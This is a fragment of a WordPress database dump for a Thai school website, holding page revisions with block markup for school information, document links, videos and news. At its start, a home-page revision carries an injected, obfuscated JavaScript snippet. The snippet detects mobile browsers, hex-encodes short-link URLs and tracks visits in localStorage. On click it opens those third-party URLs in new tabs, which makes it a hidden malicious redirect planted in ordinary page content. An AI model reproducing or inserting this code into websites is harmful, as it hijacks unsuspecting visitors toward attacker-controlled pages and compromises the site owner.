_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 09:51:11','2024-08-30 02:51:11','',19,'http://watprato.ssk.in.th/?p=289',0,'revision','',0),
(290,2,'2024-08-30 09:52:24','2024-08-30 02:52:24','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" 